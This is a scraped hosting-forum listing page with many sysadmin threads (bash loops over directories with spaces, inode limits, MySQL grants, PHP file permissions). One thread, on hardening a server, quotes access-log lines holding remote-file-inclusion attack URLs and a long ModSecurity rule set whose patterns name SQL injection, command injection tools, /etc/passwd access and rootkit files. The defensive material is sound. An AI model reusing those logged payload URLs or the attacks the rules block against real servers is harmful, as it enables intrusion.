Bash Scripting :: Inode And Directory Size Counter

Apr 4, 2009

I'm writing an inode and directory size counter, but hit a snag with directories that contain a space.

Simple code, finds all directories within a folder, sets the current directory:

for i in `find . -type d`; do ls $i; done

Looks correct? It works great, until you hit directories with spaces. So I try the following methods:

for i in `find . -type d|sed 's/ / /g'`; do ls $i; done
for i in `find . -type d|sed 's/ / /g'`; do ls "$i"; done

What is happening is, at the ( for i in ), it treats each item at the first break, if its
or a ' '. Is there a flag I can set to make it only use
? When I pipe the data, it sends each chunk of the directory through.

[root@home /home/mindbend/dev_html]# for i in `find . -type d|sed 's/ / /g'`; do ls $i; done

ls: ./test: No such file or directory
ls: ing: No such file or directory
ls: 12: No such file or directory
ls: 3: No such file or directory
ls: ./test: No such file or directory
ls: ing: No such file or directory
ls: 12: No such file or directory
ls: 3/test: No such file or directory
ls: 2: No such file or directory

# ls -d test ing 12 3/
test ing 12 3/

#ls -d test ing 12 3/test 2/
test ing 12 3/test 2/

GNU bash, version 3.2.39(1)-release (i386-portbld-freebsd7.1)
Copyright (C) 2007 Free Software Foundation, Inc.

Issue exists on linux and freebsd, same code.

View 3 Replies


ADVERTISEMENT

Linux BASH Scripting

Dec 7, 2008

I am currently trying to create a bash script which I will run off a loop with a sleep interval that will query tcpdump (udp packets only) on a network interface, and is looking for length 10 packets.

So far so good, not that hard to code I know (Already made it / coded it this far perfectly). Now here is the tricky part, I only want the bash script to identify IP's that have sent over 15 packets with the length of 10. (This is the part that I can't seem to find a way to code).

I was thinking, from the output maybe to calculate the number of lines with the same equal IP's.

Once this script identifies that, it will automatically run a command which I have set. (Quite easy, and I can do this).

I am looking for someone to help me with this. It is a fairly simple and quick job (editing the script I have at the moment). I am willing to also pay (if needed) an amount for this to be completed too. Obvieusly not that much, but still something I am sure we can work out.

View 2 Replies View Related

Grant Priviledge For A User To A Database Via Bash Scripting

Jun 4, 2007

I tried grant a user to have access to a database via a shell script.

Database 'userdb' and user 'user1' are already setup.

This is my code .

Code:
#!/bin/sh

mysql -u root -pROOTPASS <<!
grant all privileges on userdb.* to user1@localhost
identified by 'dbpasswd' with grant option;
!
The code doesn't work.

View 11 Replies View Related

Yum Install :: Bash: ./configure: No Such File Or Directory

Apr 21, 2008

Trying to install yum no RedHed EL4 with Python 2.3.4. I have downloaded [url]and untarred it. I cd'd in the to untarred directory. I then went to ./configure and it gave me:
./configure
-bash: ./configure: No such file or directory

View 8 Replies View Related

Simple Bash Command To Copy Only Directory Contents

Sep 15, 2007

Can anyone tell me a simple way in Bash to copy all of the contents of a directory (and only the contents), including hidden files, into another, existing directory?

E.g.

Code:

# I have this directory structure
- directory_A
--- existing_file
-
- directory_B
--- some_file
--- some_subdirectory
--- .some_hidden_file

# I want to end up with this

- directory_A
--- existing_file
--- some_file
--- some_subdirectory
--- .some_hidden_file
-
- directory_B
--- some_file
--- some_subdirectory
--- .some_hidden_file

# I *don't* want this

- directory_A
--- existing_file
--- directory_B
----- some_file
----- some_subdirectory
----- .some_hidden_file
-
- directory_B
--- some_file
--- some_subdirectory
--- .some_hidden_file

So far I've been stymied in finding a simple way to do this from the command prompt.

View 1 Replies View Related

Increase /home Directory Size

Apr 23, 2008

Is it possible to add another hard-drive and attach it to increase the size of the /home directory?

Beginning to run out of space.

View 6 Replies View Related

Having Inode Limitations?

Sep 15, 2008

Is there any point in having inode limitations?

View 2 Replies View Related

Account Size Not Matching Real Size

Aug 14, 2008

One of our resellers has an account.. When looking into cpanel, it says that that account is using 3300megs. When we go into the ftp of that account, in reality it is only using 1.3megs. This is a huge difference! Most of folders are empty.
We are using the latest version of WHM and Cpanel.

View 1 Replies View Related

Technical Inode Limitations

Apr 2, 2008

Warning: I do not want to re-open discussion on some previous threads about the legality of inode limitations. If it gets to that, please feel free to close this thread.

Reading through some other posts about inodes made me look at my own VPS setups. I use XenSource 3.1 on a CentOS 5 Dom0, using LVM for VM storage. When I create a new virtual machine (CentOS5 or Ubuntu, etc) I format the root filesystem with ext3. I use all the defaults, including number of inodes. So for a 20 gigabyte filesystem, I get:

Code:
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 20G 453M 19G 3% /

Filesystem Inodes IUsed IFree IUse% Mounted on
/dev/sda1 2621440 13861 2607579 1% /
Would there be any advantage to limiting the number of inodes a VPS has? Sure, if you had 200,000 inodes instead of 2.6 million inodes, you would have more available space. But there doesn't seem to be a hard limitation on the disk drives I'm using (WD 250GB SATA using linux software raid 1). I assume I could set any amount of inodes to a filesystem?

View 14 Replies View Related

Hosting Solution Alternatives To Site5 Inode Limit

Aug 15, 2008

I currently have hosting with Site5 (started back before all the overselling), and although my sites are very low in traffic and don't take up much space, I am running up against their 25,000 per site inode limit, due to my hosting a Gallery2 photo album on one of the sites (as I understand, the base install of Gallery2 uses 14,000 inodes alone. Due to how my album is integrated with the rest of the site, it would require hours and hours to switch to something besides Gallery2). All the sites together have used 17 GB of bandwidth so far this month, although much of that has been me uploading stuff to one of the sites to set it up.

Here are my sites:

- Site#1 is a family site, with family photos and a Wordpress blog. Very low traffic (a handful of visits a day), but lots of photos. Inodes not a problem for now (I'm at about 13,000), as unlike one of the other sites, I was able to switch to Zenphoto from Gallery2 pretty easily.

- Site#2 is the newest and fastest growing. It is a site for a small community of people who play a particular online computer game. It runs Drupal, and has about 60 members now, but 5-10 have been joining a day. Most online at one time has been 10. I get anywhere from 30-60 visits a day, but growing. The site uses about 150 MB of storage right now, and this will grow. No photo albums here.

- Site#3 (running Joomla and Gallery2) is for my own gaming group of 8 people that play the above computer game together each week online. Low traffic, but this is the site with the inode problem, as I post screenshots in Gallery2 after each session. Around 25,000 inodes, and 6.5 GB of storage used on the server.

- Site#4 is my wedding site, running on Wordpress. It only gets a handful of visits each day, and will get almost none after the wedding in mid September. No photo album here.

- Site#5 is my fiance's site (running Joomla), which she has pretty much not touched in a year and I doubt anyone visits, but I'm too much of a coward to take down.


With that in mind, I'm wondering what my best solution would be:
- Switch to a VPS, and if so, what kind and who?
- Switch to a different shared host with a higher inode limit
- Stay with Site5 and take the time to farm out the photo album somewhere off the site, or to another program like Zenphoto with a lower footprint.

I'm a tech-geek wannabe and willing to learn. I'm paying about $10 a month (I think) and could probably go as high as $30 or so.

View 6 Replies View Related

Cross Scripting Attack

May 10, 2009

On IIS6 many of thesite are under cross scripting attack I tried by remove the the code but it affects again after some time I reset the ftp password and passowrd is a combination of complex alpna numeric character.I have cheked the permission it is ok.

How you guys fight with cross dcripting attack.

View 9 Replies View Related

Servage With Perl Scripting

Dec 1, 2008

I've used Servage for about 18 months. For most of that time there have been no problems. Then they decided to upgrade the cluster. This happened 3 weeks ago. Since then, there has been a catalogue of problems, mostly centred around a Perl script my site uses to implement a wiki.

The first problem was that they had removed four of the supporting Perl modules used by my Perl script. All of the missing modules are ones you would expect to find on any server that claims to support Perl. They had warned that this might happen (obviously too difficult for them to make sure that the upgraded server has all the Perl modules) so I notified them with a list of missing modules expecting the modules to be restored quickly. It actually took 1 week, during which time their support team tried their best to annoy me by giving responses related to PHP (apparently they'd managed to kill PHP scripting completely) and a non-working link to a list of installed modules (I knew what was installed already).

Having now got the script running, I hit a further problem. Prior to the upgrade the script had run under the "webserver" account. It was now running under the "you" account. This meant it couldn't write to its own data files. I had real trouble getting Servage to understand this one, let alone fix it. Most of their answers were about how to change the ownership of my script, which makes absolutely no difference to the problem. Eventually, after 4 days, they tried to fix the problem. The result was that my website became completely inaccessible. Even the static content was giving a 403 error. Again, it took support a while to understand the problem and about 1.5 days to fix it.

At this point Servage claimed to have fixed all outstanding issues. However, my script was still running under the wrong account. In frustration, I changed the ownership of all the script's data files to "you", which at least got my wiki running again.

However, I now find that people can't upload images to the site. Any attempt to do so produces an error "CGI open of tmpfile: Permission denied".

I've given up. I think my chances of getting Servage to even understand the problem are minimal. I'm not even going to try. I will be moving to another host as soon as possible - probably a VPS. That way I should be able to fix most problems myself.

View 14 Replies View Related

ASP Scripting On Linux Server

Oct 1, 2007

I have my site in asp scripting but it was suspended yesterday because of high resource usage on shared server. Thats why am looking for VPS, though it is difficult to find a good windows VPS, so i have decided to get a Linux VPS. But am confused that whether a linux vps will meet my requirement.

My site is using asp scripting with access databases on backend. I can host my access databases on a windows server and can provide the link in connection string. So, will webserver on a linux server be able to execute my asp scripting fine as IIS do on windows server.

Also i have music section that plays file in .wma format using windows media player, as i have used embedded object for windows media player. So there must be windows media player installed on linux server.

whether it is good decision to host site on linux server and will my objective be met in this case.

View 6 Replies View Related

PHP Scripting And Permissions On Unix

Dec 26, 2007

I currently have a script with code below that works great when the permissions on the dbconnect.php file are 755. The problem with this is that anyone on the web can see this config file which contains passwords DOH! If I change it to 751, then it tells me "cannot connect". The user and group on both the page and this script are the same.

With apache, i use the setting to store http and https files in the same directory.

Any ideas how to make this a little more secure? Changing the permission to 751 would do the trick but then it breaks the script. I don't understand why the script would be running taking "other" permissions into account...it should be running with "user" permissions instead. it might even have something to do with who the apache executable is running as...

<?php

include("../../../cgi-bin/dbconnect.php");

// Connect to server and select database.
mysql_connect("$databasehost", "$dbuser", "$dbpword")or die("cannot connect");
mysql_select_db("$dbname")or die("cannot select DB");

View 2 Replies View Related

Kernel: EXT3-fs Error (device Loop0): Ext3_lookup: Unlinked Inode?

Jun 17, 2009

kernel: EXT3-fs error (device loop0): ext3_lookup: unlinked inode 12286 in dir #2
kernel: EXT3-fs error (device loop0): ext3_journal_start_sb: Detected aborted journal
EXT3-fs error (device loop0): ext3_lookup: unlinked inode 12286 in dir #2

View 2 Replies View Related

Counter-Strike 1.6 Server

Mar 26, 2008

We here at KAN Gaming have an extra server if a clan would like to have it please e-mail the Server Owner/Manager/Administrator at sgtmedic@gmail.com I think he is only hosting it for only $5 a month 14 - 18 slots It will have amxmodx adminmod and i BELIVEVE HLTV so give him a e-mail and he will talk to you about payment opitions most likely paypal i believe!

View 2 Replies View Related

Counter Strike Server

Jul 3, 2008

I would want to host 1, 32 Slot Counter Strike: Source server on a P4, 1GB RAM server. Do you think it would be able to run the 1 server without a problem?.

View 8 Replies View Related

Counter PHP Exploit Techniques

Feb 1, 2008

Lately, our server logs are being filled with requests from exploited servers. In order to prevent our servers from being hacked, I have tried to harden the server as much as possible. (Server: Centos 4.6, Apache 2, PHP 5, MySql 5, Cpanel/WHM)

I have detailed my efforts and would appreciate some feed back or suggestions of your own that have been effective.

-------------

Examples include c99.txt exploits, php insertions, etc.

Recent Sample Logs:

Code:
66.246.246.38 - - [30/Jan/2008:16:32:59 -0500] "GET /example.cgi?SearchIndex=http%3A%2F%2Fwww.soeasywebsite.com%2Fsoeasycasino%2Fmaj%2Fpepus%2F&amp;Manufacturer=Black+&+Decker HTTP/1.0" 406 442 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"

Code:
64.38.19.90 - - [25/Jan/2008:04:35:22 -0500] "GET /post/index/7//bm/mail.php?id=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 406 464 "-" "libwww-perl/5.808"

Code:
207.44.154.126 - - [01/Feb/2008:01:36:12 -0500] "GET /index.php?act=http%3A%2F%2Fwww.qubestunes.com%2Fte%2Fratov%2Fomuley%2F&id=2 HTTP/1.0" 200 139303 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
What to do to prevent these intrusions?

1) I have updated my Mod_Security rules (running version modsec2) to include checks for the following:

Code:
# Check Content-Length and reject all non numeric ones
SecRule REQUEST_HEADERS:Content-Length "!^d+$" "deny,log,auditlog,msg:'Content-Length HTTP header is not numeric', severity:'2',id:'960016'"

# Do not accept GET or HEAD requests with bodies
SecRule REQUEST_METHOD "^(GET|HEAD)$" "chain,deny,log,auditlog,msg:'GET or HEAD requests with bodies', severity:'2',id:'960011'"
SecRule REQUEST_HEADERS:Content-Length "!^0?$"

# Require Content-Length to be provided with every POST request.
SecRule REQUEST_METHOD "^POST$" "chain,deny,log,auditlog,msg:'POST request must have a Content-Length header',id:'960012',severity:'4'"
SecRule &REQUEST_HEADERS:Content-Length "@eq 0"

# Don't accept transfer encodings we know we don't know how to handle
SecRule HTTP_Transfer-Encoding "!^$" "deny,log,auditlog,msg:'ModSecurity does not support transfer encodings',id:'960013',severity:'5'"

# Check decodings
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|
REQUEST_HEADERS:Referer "@validateUrlEncoding"
"chain, deny,log,auditlog,msg:'URL Encoding Abuse Attack Attempt',id:'950107',severity:'4'"
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "\%(?![0-9a-fA-F]{2}|u[0-9a-fA-F]{4})"

# Proxy access attempt
SecRule REQUEST_URI ^http:/ "deny,log,auditlog,msg:'Proxy access attempt', severity:'2',id:'960014'"

#
# Restrict type of characters sent
SecRule REQUEST_FILENAME|REQUEST_HEADERS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer
"@validateByteRange 1-255"
"log,auditlog,msg:'Request Missing an Accept Header', severity:'2',id:'960015',t:urlDecodeUni,phase:1"

SecRule ARGS|ARGS_NAMES "@validateByteRange 1-255"
"deny,log,auditlog,msg:'Invalid character in request',id:'960901',severity:'4',t:urlDecodeUni,phase:2"

# allow request methods
SecRule REQUEST_METHOD "!^((?:(?:POS|GE)T|OPTIONS|HEAD))$"
"phase:1,log,auditlog,msg:'Method is not allowed by policy', severity:'2',id:'960032'"

# Restrict file extension
# removed exe so that frontpage will work

# Restricted HTTP headers
SecRule REQUEST_HEADERS_NAMES ".(?:Lock-Token|Translate|If)$"
"deny,log,auditlog,msg:'HTTP header is restricted by policy',id:'960038',severity:'4'"

SecRule HTTP_User-Agent "(?:(?:m(?:ozilla/4.0 (compatible)|etis)|webtrends security analyzer|pmafind)|n(?:-stealth|sauditor|essus|ikto)|b(?:lack ?widow|rutus|ilbo)|(?:jaascoi|paro)s|internet explorer|webinspect|.nasl)"
"deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990002',severity:'2'"
SecRule REQUEST_HEADERS_NAMES "acunetix-product"
"deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990901',severity:'2'"
SecRule REQUEST_FILENAME "^/nessustest"
"deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990902',severity:'2'"

SecRule REQUEST_HEADERS:User-Agent "(?:m(?:ozilla/(?:4.0 (compatible; advanced email extractor|2.0 (compatible; newt activex; win32))|ailto:craftbot@yahoo.com)|e(?:mail(?:(?:collec|harves|magne)t|(?: extracto|reape)r|siphon|wolf)|(?:collecto|irgrabbe)r|xtractorpro|o browse)|a(?:t(?:tache|hens)|utoemailspider|dsarobot)|w(?:eb(?:emailextrac| by mail)|3mir)|f(?:astlwspider|loodgate)|p(?:cbrowser|ackrat|surf)|(?:digout4uagen|takeou)t|(?:chinacla|be)w|hhjhj@yahoo|rsync|shai|zeus)"
"deny,log,auditlog,msg:'Rogue web site crawler',id:'990012',severity:'2'"

SecRule REQUEST_HEADERS:User-Agent "(?:(?:(?:indy librar|snoop)y|microsoft url control|lynx)|d(?:ownload demon|isco)|w(?:3mirror|get)|l(?:ibwww|wp)|p(?:avuk|erl)|cu(?:sto|rl)|big brother|autohttp|netants|eCatch)"
"chain,log,auditlog,msg:'Request Indicates an automated program explored the site',id:'990011',severity:'5'"
SecRule REQUEST_HEADERS:User-Agent "!^apache.*perl"

# Session fixation
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:.cookie.*?;W*?(?:expires|domain)W*?=|http-equivW+set-cookie)"
"capture,ctl:auditLogParts=+E,log,auditlog,msg:'Session Fixation. Matched signature <%{TX.0}>',id:'950009',severity:'2'"

# Blind SQL injection
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:(?:(?:s(?:ys.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect.{0,40}(?:substring|ascii|user))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql.user)|c(?:onstraint_type|harindex)|attnotnull)|(?:locate|instr)W+()|@@spid)"
"capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'Blind SQL Injection Attack. Matched signature <%{TX.0}>',id:'950007',severity:'2'"
SecRule REQUEST_FILENAME|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:(?:s(?:ys(?:(?:(?:process|tabl)e|filegroup|object)s|c(?:o(?:nstraint|lumn)s|at)|dba|ibm)|ubstr(?:ing)?)|user_(?:(?:(?:constrain|objec)t|tab(?:_column|le)|ind_column|user)s|password|group)|a(?:tt(?:rel|typ)id|ll_objects)|object_(?:(?:nam|typ)e|id)|pg_(?:attribute|class)|column_(?:name|id)|(?:dba|mb)_users|xtypeW+char|rownum)|t(?:able_name|extposW+())"
"capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'Blind SQL Injection Attack. Matched signature <%{TX.0}>',id:'950904',severity:'2'"

# SQL injection
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:(?:(?:s(?:elect(?:.{1,100}?(?:(?:length|count|top).{1,100}?from|from.{1,100}?where)|.*?(?:d(?:ump.*from|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_(?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebtask)|ql_(?:longvarchar|variant))|xp_(?:reg(?:re(?:movemultistring|ad)|delete(?:value|key)|enum(?:value|key)s|addmultistring|write)|e(?:xecresultset|numdsn)|(?:terminat|dirtre)e|availablemedia|loginconfig|cmdshell|filelist|makecab|ntsec)|u(?:nion.{1,100}?select|tl_(?:file|http))|group.*by.{1,100}?having|loadW*?data.*infile|(?:n?varcha|tbcreato)r|autonomous_transaction|open(?:rowset|query)|dbms_java)|i(?:n(?:toW*?(?:dump|out)file|sertW*?into|nerW*?join)|(?:f(?:W*?(W*?benchmark|null)|snull)W*?()|(?:having|or|and)s+?(?:d{1,10}|'[^=]{1,10}')s*?[=<>]+|(?:print]W*?@|root)@|c(?:astW*?(|oalesce))|(?:;W*?(?:shutdown|drop)|@@version)|'(?:s(?:qloledb|a)|msdasql|dbo)')"
"capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'SQL Injection Attack. Matched signature <%{TX.0}>',id:'950001',severity:'2'"
SecRule REQUEST_FILENAME|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:user_(?:(?:object|table|user)s|password|group)|a(?:tt(?:rel|typ)id|ll_objects)|object_(?:(?:nam|typ)e|id)|pg_(?:attribute|class)|column_(?:name|id)|substr(?:ing)?|table_name|mb_users|rownum)"
"capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'SQL Injection Attack. Matched signature <%{TX.0}>',id:'950906',severity:'2'"

# XSS
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:(?:on(?:(?:mo(?:use(?:o(?:ver|ut)|down|move|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)W*?=|abort)|(?:l(?:owsrcW*?(?:(?:java|vb)script|shell)|ivescript)|(?:href|url)W*?(?:(?:java|vb)script|shell)|background-image|mocha):|typeW*?(?:text(?:W*?(?:j(?:ava)?|ecma)script| [vbscript])|applicationW*?x-(?:java|vb)script)|s(?:(?:tyleW*=.*expressionW*|ettimeoutW*?)(|rcW*?(?:(?:java|vb)script|shell|http):)|(?:c(?:opyparentfolder|reatetextrange)|get(?:special|parent)folder)|a(?:ctivexobject|lertW*?())|<(?:(?:body.*?(?:backgroun|onloa)d|input.*?typeW*?image)|![CDATA[|script|meta)|(?:.(?:(?:execscrip|addimpor)t|(?:fromcharcod|cooki)e|innerhtml)|@import))"
"capture,ctl:auditLogParts=+E,log,auditlog,msg:'Cross-site Scripting (XSS) Attack. Matched signature <%{TX.0}>',id:'950004',severity:'2'"

# file injection
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:(?:.(?:ht(?:access|passwd|group)|www_?acl)|global.asa|httpd.conf|boot.ini)|/etc/)"
"capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'Remote File Access Attempt. Matched signature <%{TX.0}>',id:'950005',severity:'2'"

# Command access
SecRule REQUEST_FILENAME "(?:n(?:map|et|c)|w(?:guest|sh)|cmd(?:32)?|telnet|rcmd|ftp).exe"
"capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Access. Matched signature <%{TX.0}>',id:'950002',severity:'2'"

# Command injection
SecRule ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:(?:(?:n(?:et(?:W+?localgroup|.exe)|(?:map|c).exe)|t(?:racer(?:oute|t)|elnet.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp).exe|echoW*?y+)|c(?:md(?:(?:32)?.exe|W*?/c)|d(?:W*?[/]|W*?..)|hmod.{0,40}?+.{0,3}x))|[;|`]W*?(?:(?:c(?:h(?:grp|mod|own|sh)|md|pp|c)|p(?:asswd|ython|erl|ing|s)|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)|g(?:++|cc))|/(?:c(?:h(?:grp|mod|own|sh)|pp|c)|p(?:asswd|ython|erl|ing|s)|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|g(?:++|cc)|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)(?:['"|;`-s]|$))"
"capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Injection. Matched signature <%{TX.0}>',id:'950006',severity:'2'"
SecRule "ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent"
"wget"
"capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Injection. Matched signature <%{TX.0}>',id:'950907',severity:'2'"

# SSI injection
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "<!--W*?#W*?(?:e(?:cho|xec)|printenv|include|cmd)"
"capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'SSI injection Attack. Matched signature <%{TX.0}>',id:'950011',severity:'2'"

# PHP injection
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:(?:(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open)|$_(?:(?:pos|ge)t|session))|<?(?!xml))"
"capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'PHP Injection Attack. Matched signature <%{TX.0}>',id:'950013',severity:'2'"

#suntzu
SecRule REQUEST_URI|REQUEST_BODY|HTTP_Content-Disposition "/(suntzu.*|suntzu).php?cmd="

#Known rootkits
SecRule REQUEST_URI|REQUEST_BODY "perl (xpl.pl|kut|viewde|httpd.txt)"
SecRule REQUEST_URI|REQUEST_BODY "./xkernel;"
SecRule REQUEST_URI|REQUEST_BODY "/kaiten.c"
SecRule REQUEST_URI|REQUEST_BODY "/mampus?&(cmd|command)"

# WEB-MISC .htpasswd access
SecRule REQUEST_URI ".htpasswd"

# WEB-MISC /etc/passwd access
SecRule REQUEST_URI "/etc/passwd"

#Exploit agent
SecRule HTTP_User-Agent "Mosiac 1.*"

#remote bash shell
SecRule REQUEST_URI "/shell.php&cmd="
SecRule ARGS "/shell.php&cmd="

# WEB-CGI formmail
SecRule REQUEST_URI "/(formmail|mailform)(x0a|.plx0a)"

#Invision Board ipchat.php file include
SecRule REQUEST_URI "/hk/ipchat.php*root_path*conf_global.php"

#Invision Power Board SQL injection
SecRule REQUEST_URI "/hk/index.php?act=.*&max_results=.*&filter=.*&sort_order=.*&sort_key=.*&st=*(UNION|SELECT|DELETE|INSERT)"

#Invision Gallery SQL Injection Vulnerabilities
SecRule REQUEST_URI "/hk/index.php" chain
SecRule ARGS:comment "(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|*| ]+[[:space:]](from|into|table|database|index|view)"

# TIKIWIKI
SecRule REQUEST_URI "/tiki-map.phtml?mapfile=../../"

#Wordpress shell injection Vulnerability
SecRule REQUEST_URI "/cache/user.*/.*.php?cmd=" "id:390064,rev:1,severity:2,msg:'JITP: Wordpress shell injection Vulnerability'"

#Bad agent
SecRule HTTP_User-Agent "Brutus/AET"

#Web leaches
SecRule HTTP_User-Agent "Linux"
SecRule HTTP_User-Agent "libcurl-agent"
SecRule HTTP_User-Agent "TurnitinBot"
SecRule HTTP_User-Agent "ANONYMOUS"
SecRule HTTP_User-Agent "LinkWalker"
SecRule HTTP_User-Agent "Drecombot"
SecRule HTTP_User-Agent "Mac Finder"
SecRule HTTP_User-Agent "ConveraCrawler"
SecRule HTTP_User-Agent "WebarooBot"
SecRule HTTP_User-Agent "RufusBot"
SecRule HTTP_User-Agent "SumeetBot"
SecRule HTTP_User-Agent "pulseBot"
SecRule HTTP_User-Agent "FyberSpider"
SecRule HTTP_User-Agent "1-More Scanner v1.25"
SecRule HTTP_User-Agent "DRT-ResolveBot-Ignore"
SecRule HTTP_User-Agent "T-H-U-N-D-E-R-S-T-O-N-E"
SecRule HTTP_User-Agent "SnapPreviewBot"
SecRule HTTP_User-Agent "IRLbot"
SecRule HTTP_User-Agent "Charlotte"
SecRule HTTP_User-Agent "ninetowns"
SecRule HTTP_User-Agent "heritrix"
SecRule HTTP_User-Agent "Python-urllib"
SecRule HTTP_User-Agent "InetURL"
SecRule HTTP_User-Agent "cazoodle"
SecRule HTTP_User-Agent "DepSpid" "deny,nolog,status:410"
SecRule HTTP_User-Agent "Browsezilla"
SecRule HTTP_User-Agent "MetagerBot"
SecRule HTTP_User-Agent "TALWinHttpClient"
SecRule HTTP_User-Agent "Snapbot"
SecRule HTTP_User-Agent "BDFetch"
SecRule HTTP_User-Agent "WebaltBot"
SecRule HTTP_User-Agent "VSynCrawler"
SecRule HTTP_User-Agent "UbiCrawler"
SecRule HTTP_User-Agent "WebCapture"
SecRule HTTP_User-Agent "WebCopier"
SecRule HTTP_User-Agent "FairAd Client"
SecRule HTTP_User-Agent "Black Hole"
SecRule HTTP_User-Agent "Crescent"
SecRule HTTP_User-Agent "MIIxpc"
SecRule HTTP_User-Agent "Harvest"
SecRule HTTP_User-Agent "LinkextractorPro"
SecRule HTTP_User-Agent "Snoopy"
SecRule HTTP_User-Agent "IDBot"
SecRule HTTP_User-Agent "Cyveillance" "deny,nolog,status:404"
SecRule HTTP_User-Agent "PEAR HTTP_Request class"
SecRule HTTP_User-Agent "libwww-perl"

11) Review my logs daily to look for problem child scrapers, hackers, and issues.

View 8 Replies View Related

Reboot Counter Strike Using .bat

Feb 27, 2007

Is there a script where i can stop counter strike source game at certian time by using .bat? I only need .bat script and not any other software. I don't know where this goes, so put this somewhere admin.

View 0 Replies View Related

Counter Strike Game Server!

May 6, 2009

I setup a counter-strike game server on my cPanel dedicated server with cPGS and i have a problem/error. When peoples try to connect to my counter-strike game server it`s appears an error like "Invalid key server", something like that. What it`s the problem and how can i fix it?
Can someone please help me to fix this problem.

View 11 Replies View Related

Plesk 12.x / Linux :: Resource Counter Disk Share Used Is Full

Oct 15, 2014

My server show disk full.

View 1 Replies View Related

CPanel Directory / Sub-Directory Protection (Linux Shared Hosting)

May 31, 2007

I have a situation like this:

There is a directory say, "Master" and inside, "Master" there is sub-directory, "Slave". A user who has access to, "Master" should be able to access, "Slave" automatically. However, a user who has access to, "Slave" should not have access to, "Master". Inside cPanel this type of protection is not possible.

View 3 Replies View Related

Httpd Directory Alias (public_html) Virtual Directory

Dec 11, 2008

How do I direct my httpd file to point to:

home/USER/public_html
instead of:
C:Users estetc...

I want to do this to make my test server just like the remote server.

View 5 Replies View Related

Move The Entire Contents Of A Directory Tree To Another Directory

Sep 18, 2008

I want to move the entire contents of a directory tree to another directory.

So for example we may have a directory with 15 directories inside, each directory contains files itself. I want to copy all the files from the directory tree into another directory located somewhere else one the file system. I want only the "files" to end up in the other directory and not the file structure too.

Im running CENTOS latest version.

View 4 Replies View Related

You Have A Mail Bash:~#

Jun 15, 2008

I opened up my VPS bash today and I saw a message like this:

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
..........................
..........................
You have a mail.
bash:~#

Now I am confused from where have I received a mail, and even if I have received it why doesn't it shows in Google Apps??

I have set the MX Entries correctly and when I sent a mail specifically to admin@mysite.com , I do get a mail in google apps.

Anyways where does this mail lie, how can I view this mail ?? I installed postfix as my mailing server.

View 6 Replies View Related

SSH Bash Error

Aug 9, 2008

When I log into my clients VPS via SSH and I get the following error...

login as: root
root@69.162.67.44's password:
Last login: Sun Jan 20 23:33:36 2008 from 122.167.25.31
-bash-3.1#

View 11 Replies View Related

Bash SSH Command

Jun 30, 2007

I've just about got my mysqldump script ready,

Here is what it looks like:

Code:
#!/bin/sh
mysqldump -uusr -ppwd --opt db > /home/usr/dbs/1.sql
mysqldump -uusr -ppwd --opt db2 > /home/usr/dbs/2.sql

cd /home/usr/dbs
tar -zcvf sqldata.tgz *.sql

How would I make my finished gzipped file's filename to include the date?

Would I add any tags infront of sqldata.tgz *.sql?

Or would I have to run another command after the last line?

View 14 Replies View Related

